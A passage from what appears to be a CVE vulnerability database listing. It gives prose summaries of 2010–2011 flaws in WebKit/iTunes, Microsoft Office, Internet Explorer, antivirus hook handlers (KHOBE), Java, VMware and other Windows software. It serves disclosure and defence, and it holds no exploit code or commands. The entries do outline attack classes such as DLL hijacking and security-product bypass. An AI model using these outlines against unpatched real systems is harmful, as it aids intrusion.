vulnerability in the Runin box functionality in the Cascading Style Sheets (CSS) 2.1 Visual Formatting Model implementation in WebKit, as used in Apple iTunes before 10.2 on Windows and Apple Safari, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0131] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0130] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0129] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0128] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0127] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0126] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0125] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0124] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0123] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0122] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0121] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0120] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0119] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0118] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0117] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0116] Use-after-free vulnerability in the setOuterText method in the htmlelement library in WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to DOM manipulations during iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0115] The DOM level 2 implementation in WebKit, as used in Apple iTunes before 10.2 on Windows and Apple Safari, does not properly handle DOM manipulations associated with event listeners during processing of range objects, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0114] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0113] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0112] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0111] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0107] Untrusted search path vulnerability in Microsoft Office XP SP3, Office 2003 SP3, and Office 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .docx file, aka "Office Component Insecure Library Loading Vulnerability." [CVE-2011-0105] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac obtain a certain length value from an uninitialized memory location, which allows remote attackers to trigger a buffer overflow and execute arbitrary code via a crafted Excel file, aka "Excel Data Initialization Vulnerability." [CVE-2011-0104] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HLink record in an Excel file, aka "Excel Buffer Overwrite Vulnerability." [CVE-2011-0103] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted record information in an Excel file, aka "Excel Memory Corruption Vulnerability." [CVE-2011-0101] Microsoft Excel 2002 SP3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted RealTimeData record, related to a stTopic field, doubly-byte characters, and an incorrect pointer calculation, aka "Excel Record Parsing WriteAV Vulnerability." [CVE-2011-0098] Integer signedness error in Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0097] Integer underflow in Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0094] Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Layouts Handling Memory Corruption Vulnerability." [CVE-2011-0093] ELEMENTS.DLL in Microsoft Visio 2002 SP2, 2003 SP3, and 2007 SP2 does not properly parse structures during the opening of a Visio file, which allows remote attackers to execute arbitrary code via a file containing a malformed structure, aka "Visio Data Type Memory Corruption Vulnerability." [CVE-2011-0092] The LZW stream decompression functionality in ORMELEMS.DLL in Microsoft Visio 2002 SP2, 2003 SP3, and 2007 SP2 allows remote attackers to execute arbitrary code via a Visio file with a malformed VisioDocument stream that triggers an exception handler that accesses an object that has not been fully initialized, which triggers memory corruption, aka "Visio Object Memory Corruption Vulnerability." [CVE-2011-0071] Directory traversal vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, Thunderbird before 3.1.10, and SeaMonkey before 2.0.14 on Windows allows remote attackers to determine the existence of arbitrary files, and possibly load resources, via vectors involving a resource: URL. [CVE-2011-0058] Buffer overflow in Mozilla Firefox before 3.5.17 and 3.6.x before 3.6.14, and SeaMonkey before 2.0.12, on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a long string that triggers construction of a long text run. [CVE-2011-0038] Untrusted search path vulnerability in Microsoft Internet Explorer 8 might allow local users to gain privileges via a Trojan horse IEShims.dll in the current working directory, as demonstrated by a Desktop directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-0036] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, relagted to a "dangling pointer," aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2010-2556 and CVE-2011-0035. [CVE-2011-0035] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2010-2556 and CVE-2011-0036. [CVE-2011-0029] Untrusted search path vulnerability in the client in Microsoft Remote Desktop Connection 5.2, 6.0, 6.1, and 7.0 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .rdp file, aka "Remote Desktop Insecure Library Loading Vulnerability." [CVE-2010-5184] DISPUTED Race condition in ZoneAlarm Extreme Security 9.1.507.000 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5183] DISPUTED Race condition in Webroot Internet Security Essentials 6.1.0.145 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5182] DISPUTED Race condition in VirusBuster Internet Security Suite 3.2 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5181] DISPUTED Race condition in VIPRE Antivirus Premium 4.0.3272 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5180] DISPUTED Race condition in VBA32 Personal 3.12.12.4 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5179] DISPUTED Race condition in Trend Micro Internet Security Pro 2010 17.50.1647.0000 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5178] DISPUTED Race condition in ThreatFire 4.7.0.17 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5177] DISPUTED Race condition in Sophos Endpoint Security and Control 9.0.5 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: the vendor disputes this issue because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5176] DISPUTED Race condition in Security Shield 2010 13.0.16.313 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5175] DISPUTED Race condition in PrivateFirewall 7.0.20.37 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5174] DISPUTED Race condition in Prevx 3.0.5.143 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5173] DISPUTED Race condition in PC Tools Firewall Plus 6.0.0.88 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5172] DISPUTED Race condition in Panda Internet Security 2010 15.01.00 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5171] DISPUTED Race condition in Outpost Security Suite Pro 6.7.3.3063.452.0726 and 7.0.3330.505.1221 BETA on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5170] DISPUTED Race condition in Online Solutions Security Suite 1.5.14905.0 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5169] DISPUTED Race condition in Online Armor Premium 4.0.0.35 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5168] DISPUTED Race condition in Symantec Norton Internet Security 2010 17.5.0.127 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5167] DISPUTED Race condition in Norman Security Suite PRO 8.0 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5166] DISPUTED Race condition in McAfee Total Protection 2010 10.0.580 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5165] DISPUTED Race condition in Malware Defender 2.6.0 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5164] DISPUTED Race condition in KingSoft Personal Firewall 9 Plus 2009.05.07.70 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5163] DISPUTED Race condition in Kaspersky Internet Security 2010 9.0.0.736 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5162] DISPUTED Race condition in G DATA TotalCare 2010 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5161] DISPUTED Race condition in F-Secure Internet Security 2010 10.00 build 246 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5160] DISPUTED Race condition in ESET Smart Security 4.2.35.3 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5159] DISPUTED Race condition in Dr.Web Security Space Pro 6.0.0.03100 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5158] DISPUTED Race condition in DefenseWall Personal Firewall 3.00 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5157] Race condition in Comodo Internet Security before 4.1.149672.916 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. [CVE-2010-5156] DISPUTED Race condition in CA Internet Security Suite Plus 2010 6.0.0.272 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5155] DISPUTED Race condition in Blink Professional 4.6.1 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5154] DISPUTED Race condition in BitDefender Total Security 2010 13.0.20.347 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5153] DISPUTED Race condition in Avira Premium Security Suite 10.0.0.536 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5152] DISPUTED Race condition in AVG Internet Security 9.0.791 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5151] DISPUTED Race condition in avast! Internet Security 5.0.462 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5150] DISPUTED Race condition in 3D EQSecure Professional Edition 4.2 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5145] The Filtering Service in Websense Web Security and Web Filter before 6.3.1 Hotfix 136 and 7.x before 7.1.1 on Windows allows remote attackers to cause a denial of service (filtering outage) via a crafted sequence of characters in a URI. [CVE-2010-5144] The ISAPI Filter plug-in in Websense Enterprise, Websense Web Security, and Websense Web Filter 6.3.3 and earlier, when used in conjunction with a Microsoft ISA or Microsoft Forefront TMG server, allows remote attackers to bypass intended filtering and monitoring activities for web traffic via an HTTP Via header. [CVE-2010-5071] The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method. [CVE-2010-4833] Untrusted search path vulnerability in modules/engines/ms-windows/xp_theme.c in GTK+ before 2.24.0 allows local users to gain privileges via a Trojan horse uxtheme.dll file in the current working directory, a different vulnerability than CVE-2010-4831. [CVE-2010-4785] The do_extendedOp function in ibmslapd in IBM Tivoli Directory Server (TDS) 6.0 before 6.0.0.62 (aka 6.0.0.8-TIV-ITDS-IF0004) on Linux, Solaris, and Windows allows remote authenticated users to cause a denial of service (ABEND) via a malformed LDAP extended operation that triggers certain comparisons involving the NULL operation OID. [CVE-2010-4643] Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted Truevision TGA (TARGA) file in an ODF or Microsoft Office document. [CVE-2010-4588] The WBEMSingleView.ocx ActiveX control 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier allows remote attackers to execute arbitrary code via a crafted argument to the ReleaseContext method, a different vector than CVE-2010-3973, possibly an untrusted pointer dereference. [CVE-2010-4587] Opera before 11.00 on Windows does not properly implement the Insecure Third Party Module warning message, which might make it easier for user-assisted remote attackers to have an unspecified impact via a crafted module. [CVE-2010-4466] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier for Windows, Solaris, and, Linux [CVE-2010-4451] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier for Windows, when using Java Update, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install. [CVE-2010-4423] Unspecified vulnerability in the Cluster Verify Utility component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.1, when running on Windows, allows local users to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2010-4368] awstats.cgi in AWStats before 7.0 on Windows accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located at a UNC share pathname. [CVE-2010-4294] The frame decompression functionality in the VMnc media codec in VMware Movie Decoder before 6.5.5 build 328052 and 7.x before 7.1.2 build 301548, VMware Workstation 6.5.x before 6.5.5 build 328052 and 7.x before 7.1.2 build 301548 on Windows, VMware Player 2.5.x before 2.5.5 build 246459 and 3.x before 3.1.2 build 301548 on Windows, and VMware Server 2.x on Windows does not properly validate an unspecified size field, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted video file. [CVE-2010-4253] Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PNG file in an ODF or Microsoft Office document, as demonstrated by a PowerPoint (aka PPT) document. [CVE-2010-4121] DISPUTED The TCP-to-ODBC gateway in IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.3 does not require authentication for SQL statements, which allows remote attackers to modify, create, or read database records via a session on TCP port 2020. NOTE: the vendor disputes this issue, stating that the "default Microsoft Access database is not password protected because it is intended to be used for evaluation purposes only." [CVE-2010-4091] The EScript.api plugin in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.1, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document that triggers memory corruption, involving the printSeps function. NOTE: some of these details are obtained from third party information. [CVE-2010-3976] Untrusted search path vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll that is located in the same folder as a file that is processed by Flash Player. [CVE-2010-3972] Heap-based buffer overflow in the TELNET_STREAM_CONTEXT::OnSendData function in ftpsvc.dll in Microsoft FTP Service 7.0 and 7.5 for Internet Information Services (IIS) 7.0, and IIS 7.5, allows remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via a crafted FTP command, aka "IIS FTP Service Heap Buffer Overrun Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2010-3971] Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability." [CVE-2010-3964] Unrestricted file upload vulnerability in the Document Conversions Launcher Service in Microsoft Office SharePoint Server 2007 SP2, when the Document Conversions Load Balancer Service is enabled, allows remote attackers to execute arbitrary code via a crafted SOAP request to TCP port 8082, aka "Malformed Request Code Execution Vulnerability." [CVE-2010-3962] Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an "invalid flag reference" issue or "Uninitialized Memory Corruption Vulnerability," as exploited in the wild in November 2010. [CVE-2010-3958] The x86 JIT compiler in Microsoft .NET Framework 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 does not properly compile function calls, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Stack Corruption Vulnerability." [CVE-2010-3955] pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3 does not properly perform array indexing, which allows remote attackers to execute arbitrary code via a crafted Publisher file that uses an old file format, aka "Array Indexing Memory Corruption Vulnerability." [CVE-2010-3954] Microsoft Publisher 2002 SP3, 2003 SP3, and 2010 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Publisher file, aka "Microsoft Publisher Memory Corruption Vulnerability." [CVE-2010-3952] The FlashPix image converter in the graphics filters in Microsoft Office XP SP3 and Office Converter Pack allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted FlashPix image in an Office document, aka "FlashPix Image Converter Heap Corruption Vulnerability." [CVE-2010-3951] Buffer overflow in the FlashPix image converter in the graphics filters in Microsoft Office XP SP3 and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted FlashPix image in an Office document, 